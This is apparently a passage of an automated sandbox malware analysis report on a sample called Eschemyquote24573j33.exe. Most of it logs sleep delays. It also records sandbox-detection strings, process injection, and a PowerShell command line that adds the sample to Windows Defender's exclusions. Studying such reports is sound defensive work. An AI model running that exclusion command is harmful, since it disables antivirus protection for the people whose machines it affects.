                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 4668 Thread sleep time: -2394906s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 4668 Thread sleep time: -2394797s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 4668 Thread sleep time: -2394683s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 4668 Thread sleep time: -2394574s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 4668 Thread sleep time: -2394468s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 4668 Thread sleep time: -2394359s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 4668 Thread sleep time: -2394245s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 3576 Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5452 Thread sleep count: 37 > 30
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5452 Thread sleep time: -34126476536362649s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5452 Thread sleep time: -2400000s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5832 Thread sleep count: 4657 > 30
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5452 Thread sleep time: -2399890s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5452 Thread sleep time: -2399765s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5452 Thread sleep time: -2399656s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5832 Thread sleep count: 5193 > 30
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5452 Thread sleep time: -2399546s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5452 Thread sleep time: -2399403s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5452 Thread sleep time: -2399296s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5452 Thread sleep time: -2399185s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5452 Thread sleep time: -2399077s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5452 Thread sleep time: -2398969s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5452 Thread sleep time: -2398859s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5452 Thread sleep time: -2398750s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5452 Thread sleep time: -2398640s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5452 Thread sleep time: -2398530s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5452 Thread sleep time: -2398422s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5452 Thread sleep time: -2398312s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5452 Thread sleep time: -2398201s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5452 Thread sleep time: -2398093s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5452 Thread sleep time: -2397984s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5452 Thread sleep time: -2397875s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5452 Thread sleep time: -2397765s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5452 Thread sleep time: -2397656s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5452 Thread sleep time: -2397547s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5452 Thread sleep time: -2397435s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5452 Thread sleep time: -2397328s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5452 Thread sleep time: -2397218s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5452 Thread sleep time: -2397104s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5452 Thread sleep time: -2397000s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5452 Thread sleep time: -2396845s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5452 Thread sleep time: -2396719s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5452 Thread sleep time: -2396594s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5452 Thread sleep time: -2396481s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5452 Thread sleep time: -2396375s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5452 Thread sleep time: -2396258s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5452 Thread sleep time: -2396156s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5452 Thread sleep time: -2396047s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5452 Thread sleep time: -2395937s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5452 Thread sleep time: -2395828s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5452 Thread sleep time: -2395719s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5452 Thread sleep time: -2395594s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5452 Thread sleep time: -2395484s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5452 Thread sleep time: -2395375s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5452 Thread sleep time: -2395266s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5452 Thread sleep time: -2395156s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5452 Thread sleep time: -2395047s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5452 Thread sleep time: -2394937s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5452 Thread sleep time: -2394828s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5452 Thread sleep time: -2394719s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5452 Thread sleep time: -2394609s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5452 Thread sleep time: -2394500s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5452 Thread sleep time: -2394391s >= -30000s
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe Last function: Thread delayed
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe Last function: Thread delayed
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe Thread delayed: delay time: 2400000
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe Thread delayed: delay time: 2399875
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe Thread delayed: delay time: 2399765
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe Thread delayed: delay time: 2399654
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe Thread delayed: delay time: 2399546
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe Thread delayed: delay time: 2399431
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe Thread delayed: delay time: 2399327
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe Thread delayed: delay time: 2399216
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe Thread delayed: delay time: 2399109
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe Thread delayed: delay time: 2399000
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe Thread delayed: delay time: 2398890
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe Thread delayed: delay time: 2398780
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe Thread delayed: delay time: 2398671
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe Thread delayed: delay time: 2398562
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe Thread delayed: delay time: 2398451
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe Thread delayed: delay time: 2398343
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe Thread delayed: delay time: 2398234
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe Thread delayed: delay time: 2398125
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe Thread delayed: delay time: 2397955
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe Thread delayed: delay time: 2397750
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe Thread delayed: delay time: 2397637
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe Thread delayed: delay time: 2397529
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe Thread delayed: delay time: 2397389
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe Thread delayed: delay time: 2397281
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe Thread delayed: delay time: 2397171
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe Thread delayed: delay time: 2397059
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe Thread delayed: delay time: 2396953
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe Thread delayed: delay time: 2396843
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe Thread delayed: delay time: 2396734
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe Thread delayed: delay time: 2396625
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe Thread delayed: delay time: 2396515
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe Thread delayed: delay time: 2396406
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe Thread delayed: delay time: 2396296
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe Thread delayed: delay time: 2396187
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe Thread delayed: delay time: 2396078
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe Thread delayed: delay time: 2395968
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe Thread delayed: delay time: 2395859
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe Thread delayed: delay time: 2395750
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe Thread delayed: delay time: 2395640
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe Thread delayed: delay time: 2395531
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe Thread delayed: delay time: 2395421
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe Thread delayed: delay time: 2395282
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe Thread delayed: delay time: 2395164
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe Thread delayed: delay time: 2395052
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe Thread delayed: delay time: 2394937
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe Thread delayed: delay time: 2394828
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe Thread delayed: delay time: 2394718
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe Thread delayed: delay time: 2394607
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe Thread delayed: delay time: 2394500
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe Thread delayed: delay time: 2394390
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe Thread delayed: delay time: 2394281
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2400000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2399874Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2399766Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2399656Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2399547Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2399437Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2399328Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2399219Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398911Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398754Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398641Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398516Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398406Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398296Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398187Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398077Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2397969Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2397859Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2397750Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2397637Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2397531Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2397416Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2397312Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2397203Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2397093Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396984Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396875Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396766Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396656Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396547Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396437Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396328Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396218Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396109Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395891Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395781Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395672Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395557Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395453Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395343Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395234Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395125Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395016Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2394906Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2394797Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2394683Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2394574Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2394468Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2394359Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2394245Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2400000
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2399890
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2399765
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2399656
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2399546
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2399403
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2399296
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2399185
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2399077
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398969
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398859
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398750
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398640
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398530
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398422
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398312
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398201
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398093
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2397984
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2397875
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2397765
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2397656
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2397547
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2397435
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2397328
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2397218
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2397104
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2397000
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396845
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396719
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396594
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396481
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396375
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396258
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396156
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396047
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395937
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395828
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395719
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395594
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395484
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395375
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395266
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395156
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395047
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2394937
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2394828
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2394719
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2394609
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2394500
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2394391
Source: Eschemyquote24573j33.exe, 00000000.00000002.2066235627.0000000000973000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\xE
Source: Eschemyquote24573j33.exe, 00000004.00000002.4513394772.0000000006830000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe | Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe | Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe | Process token adjusted: Debug
Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe | Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Eschemyquote24573j33.exe"
Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Eschemyquote24573j33.exe"
Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe | Memory written: C:\Users\user\Desktop\Eschemyquote24573j33.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Memory written: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Memory written: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Eschemyquote24573j33.exe"
